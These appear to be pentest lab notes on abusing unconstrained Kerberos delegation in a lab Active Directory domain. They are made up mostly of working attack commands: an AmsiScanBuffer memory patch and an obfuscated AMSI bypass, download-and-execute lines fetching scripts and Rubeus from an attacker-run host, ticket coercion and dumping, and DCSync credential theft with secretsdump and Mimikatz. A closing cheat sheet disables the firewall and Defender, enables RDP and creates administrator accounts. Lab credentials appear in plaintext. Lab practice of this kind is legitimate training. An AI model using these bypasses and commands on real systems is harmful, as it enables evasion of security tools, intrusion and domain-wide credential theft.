Unconstrain
To exploit an unconstrained delegation the simplest way is to do that from windows with Rubeus.
We launch an RDP connection on Bronx.
We got Fernando.Alonzo password's from the donPAPI dump
xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80% /cert-ignore
From there we will bypass AMSI and launch Rubeus in memory
Prepare our server containing Rubeus.exe and our AMSI bypass.
python3 -m http.server 8080
On the RDP session bypass AMSI :
amsi_rmouse.txt contains the below commands
# Patching amsi.dll AmsiScanBuffer by rasta-mouse
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
Download Rebeus.exe to Parrot OS
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Download the and execute amsi_rmouse.txt to bypass AMSI
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX
Now launch Rubeus in memory with execute assembly.
First we will list the available tickets :
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8000/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

And now force a coerce of the DC NYC to the DC Bronx.
Coercer fuzz -u pablo.sandoval -d north.newyork.local -p baseballpanda -t nyc.newyork.local
We look on the triage again :
[Rubeus.Program]::MainString("triage")
And now the tgt of NYC is present

To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly)
[Rubeus.Program]::MainString("dump /user:nyc$ /service:krbtgt /nowrap");

We now have the TGT of the domain controller
Let’s continue on linux to pass the ticket and launch dcsync with secretdump :
copy the ticket without space and return line (in vim i do :
:%s/\s*\n\s*//g
)convert the ticket to ccache
use the kerberos ticket and launch secretdump
cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC

Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on bonx and bypass the defender AV
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
https://github.com/SolomonSklash/RubeusToCcache
rubeus.exe monitor /targetuser:nyc$ /interval:10
https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe
SpoolSample.exe nyc bronx
kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi
lsadump::dcsync /domain:newyork.local /user:nyc$
[IO.File]::WriteAllBytes("C:\Users\fernando.Alonzo\Desktop\DC.kirbi", [Convert]::FromBase64String("base64"))
https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919
kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi
lsadump::dcsync /domain:newyork.local /user:nyc$
lsadump::lsa /domain:newyork.local /user:nyc$
lsadump::dcsync /user:krbtgt
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
CMD
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
Set-MpPreference -DisableRealtimeMonitoring $true
#Change User Password via powershell administrator
Set-ADAccountPassword -Identity $user -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "$newPass" -Force)
#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Create new user
net user username password /ADD
#To add a new user account to the domain:
net user username password /ADD /DOMAIN
#Add user to Admin Group
net localgroup Administrators Tom /add
Last updated